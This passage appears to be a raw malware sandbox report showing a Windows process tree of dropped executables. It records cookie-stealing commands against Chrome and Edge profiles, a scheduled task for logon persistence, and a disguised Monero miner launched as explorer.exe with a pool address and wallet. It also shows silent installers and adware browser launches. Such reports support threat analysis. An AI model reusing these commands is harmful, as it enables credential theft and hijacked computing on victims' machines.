C:\Users\Admin\Documents\iN1vEaA5nIXun0Ch70YplDck.exe"C:\Users\Admin\Documents\iN1vEaA5nIXun0Ch70YplDck.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\4vd7wzaSJ6O6_peChFvraIg4.exe"C:\Users\Admin\Documents\4vd7wzaSJ6O6_peChFvraIg4.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\Msbq7N806vY_kgIRiAQxy9Gp.exe"C:\Users\Admin\Documents\Msbq7N806vY_kgIRiAQxy9Gp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\g2lVQYLYuJPgPh38AhEEXnAB.exe"C:\Users\Admin\Documents\g2lVQYLYuJPgPh38AhEEXnAB.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\BsSk35ZHvQtQ6ycRA83qwiKw.exe"C:\Users\Admin\Documents\BsSk35ZHvQtQ6ycRA83qwiKw.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\2YaXYEQpN4D2gejue_SlPHNO.exe"C:\Users\Admin\Documents\2YaXYEQpN4D2gejue_SlPHNO.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
-
-
C:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exe"C:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exeC:\Users\Admin\Documents\mdff13DR1phi2sNDJO2fNU5a.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe"C:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exeC:\Users\Admin\Documents\ULQYaddSV6Nl0fN2ZjJ2vuRQ.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"C:\Users\Admin\Documents\FKk6yd4IL4syFy2gnZDVAaMN.exe"4⤵
-
-
-
C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"C:\Users\Admin\Documents\E2i_Z1Qek7wHynzKk_G2TtiN.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe"C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe"C:\Users\Admin\Documents\xcxnFVjqK8FKwg5Qa512Ep3r.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 10005⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exe"C:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exeC:\Users\Admin\Documents\0uMnKiiiV3FrbB3NKKa40YY1.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Documents\1fp8I1cI5udt6HxCGu4Pot5B.exe"C:\Users\Admin\Documents\1fp8I1cI5udt6HxCGu4Pot5B.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\R_dHTTFWkvGJQgRWc10ATFp3.exe"C:\Users\Admin\Documents\R_dHTTFWkvGJQgRWc10ATFp3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 2164⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\Documents\9mjwIGTITPLyL7mQH0BWmdnw.exe"C:\Users\Admin\Documents\9mjwIGTITPLyL7mQH0BWmdnw.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\x1r61B6_PO48yubFuSiv5RUD.exe"C:\Users\Admin\Documents\x1r61B6_PO48yubFuSiv5RUD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-3P6AG.tmp\x1r61B6_PO48yubFuSiv5RUD.tmp"C:\Users\Admin\AppData\Local\Temp\is-3P6AG.tmp\x1r61B6_PO48yubFuSiv5RUD.tmp" /SL5="$2026E,138429,56832,C:\Users\Admin\Documents\x1r61B6_PO48yubFuSiv5RUD.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-SKB14.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SKB14.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-54F6G.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-54F6G.tmp\MediaBurner2.tmp" /SL5="$30340,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IUUI5.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-IUUI5.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2JVMG.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-2JVMG.tmp\ultramediaburner.tmp" /SL5="$602A4,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\AZJJCIMFDJ\ultramediaburner.exe" /VERYSILENT10⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\57-9f673-5d5-2b196-f9412c40530c1\Xorupulyqa.exe"C:\Users\Admin\AppData\Local\Temp\57-9f673-5d5-2b196-f9412c40530c1\Xorupulyqa.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311910⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x120,0x124,0x128,0x11c,0xf8,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fa-40d04-f92-36485-db4988c48c211\Tironinebo.exe"C:\Users\Admin\AppData\Local\Temp\fa-40d04-f92-36485-db4988c48c211\Tironinebo.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hwgebn0e.hxw\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hwgebn0e.hxw\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\hwgebn0e.hxw\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 28012⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dzfo2u10.v4i\JoSetp.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\dzfo2u10.v4i\JoSetp.exeC:\Users\Admin\AppData\Local\Temp\dzfo2u10.v4i\JoSetp.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit13⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'14⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit14⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'15⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"14⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exeC:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0b40itrk.vop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629059113 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0uxmn01e.m5y\ufgaa.exe & exit10⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exeC:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe"C:\Users\Admin\AppData\Local\Temp\djuskcqs.nw1\anyname.exe" -q12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6868 -s 96813⤵
- Program crash
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgwa0pij.iry\askinstall52.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\zgwa0pij.iry\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\zgwa0pij.iry\askinstall52.exe11⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6736 -s 177212⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kmmlpeyn.x1t\cleanpro13.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\kmmlpeyn.x1t\cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\kmmlpeyn.x1t\cleanpro13.exe11⤵
-
C:\Users\Admin\Documents\ZAKl954tl_dxwQ6Fjq_xNBzk.exe"C:\Users\Admin\Documents\ZAKl954tl_dxwQ6Fjq_xNBzk.exe"12⤵
-
-
C:\Users\Admin\Documents\oZPwEtxdba8Hq852lnSLxB_Y.exe"C:\Users\Admin\Documents\oZPwEtxdba8Hq852lnSLxB_Y.exe"12⤵
-
-
C:\Users\Admin\Documents\lIziCFK1Rfh68XBj6eK8MOCp.exe"C:\Users\Admin\Documents\lIziCFK1Rfh68XBj6eK8MOCp.exe"12⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
